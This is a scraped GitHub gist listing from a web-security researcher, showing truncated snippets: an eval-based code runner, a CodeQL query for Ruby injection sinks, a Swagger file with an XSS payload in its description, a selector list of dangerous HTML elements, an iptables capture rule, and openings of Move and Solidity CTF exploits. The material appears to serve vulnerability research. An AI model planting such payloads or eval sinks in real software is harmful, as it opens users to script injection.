原文: https://portswigger.net/research/top-10-web-hacking-techniques-of-2023-nominations-open
分类: 漏洞披露-Ruby
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head> | |
| <title>JavaScript Execution</title> | |
| <script> | |
| function executeCode() { | |
| const input = document.getElementById('inputCode').value; | |
| const output = document.getElementById('outputResult'); | |
| try { | |
| const result = eval(input); | |
| output.textContent = result; |
kaiili
/ 2024-01-hack-review.md
Last active
January 20, 2024 13:54
[review] Top 10 web hacking techniques of 2023 by portswigger
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // send 需要2 参数可控 | |
| // public_send 需要 3 参数可控 | |
| // (1) todo 对参数本身的类型检查 | |
| // (2) todo 对方法本身的检查 | |
| // (3) 对 location的检查, 去除 _spec.rb, _example.rb, 直接删除然后构建 database | |
| import codeql.ruby.DataFlow | |
| from DataFlow::CallNode call | |
| where | |
| call.getNumberOfArguments() = 2 and |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import struct | |
| import asyncio | |
| # JDBC 客户端会去请求的地址 | |
| # 最终的请求: http://127.0.0.1:1881/.well-known/openid-configuration | |
| url = "http://127.0.0.1:1881/" | |
| # 自动化拼接字符串 | |
| # 0x 是占位符, 大量的数据来自 OCR, 为了对齐缺少的行 |
kaiili
/ test.ipynb
Created
March 15, 2023 05:11
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "swagger": "2.0", | |
| "info": { | |
| "description": "<select><template><img src=x onerror=alert(1)></template></select>", | |
| "version": "1.0.6", | |
| "title": "Swagger Petstore", | |
| "termsOfService": "11", | |
| "contact": { | |
| "email": "[email protected]" | |
| }, |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| dom.querySelector("script") || | |
| dom.querySelector("svg") || | |
| dom.querySelector("meta") || | |
| dom.querySelector("x") || // todo: x:script | |
| dom.querySelector("object[data]") || | |
| dom.querySelector("iframe[src]") || | |
| dom.querySelector("iframe[srcdoc]") || | |
| dom.querySelector("embed[src]") || | |
| dom.querySelector("base[href]") || | |
| dom.querySelector("form[formaction]") || |
kaiili
/ match.sh
Created
February 16, 2023 07:33
配置特定应用的端口转发,可用于抓包,来自 https://mp.weixin.qq.com/s/P0ESUUXBmq2aQnrqDHsDaw
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| iptables -t nat -A OUTPUT -p tcp ! -d 127.0.0.1 -m owner --uid-owner 2000 -m multiport --dports 80,443 -j DNAT --to-destination 127.0.0.1:8080 | |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // code : https://github.com/movebit/movectf-6 | |
| // sui move build --dump-bytecode-as-base64 --path . | |
| // sui client publish --path ./ --gas-budget 30000 | |
| module c6::exp { | |
| use ctf::hero; | |
| use ctf::adventure; | |
| use sui::tx_context::TxContext; | |
| public entry fun start( | |
| h: &mut hero::Hero, ctx: &mut TxContext | |
| ): () { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| pragma solidity ^0.8.7; | |
| interface Target { | |
| function profit() external; | |
| function guess(uint guess_secret) external; | |
| function transfer(address to, uint amount) external; | |
| function payforflag(string memory md5ofteamtoken,string memory b64email)external; | |
| function withdraw(uint amount) external; |
NewerOlder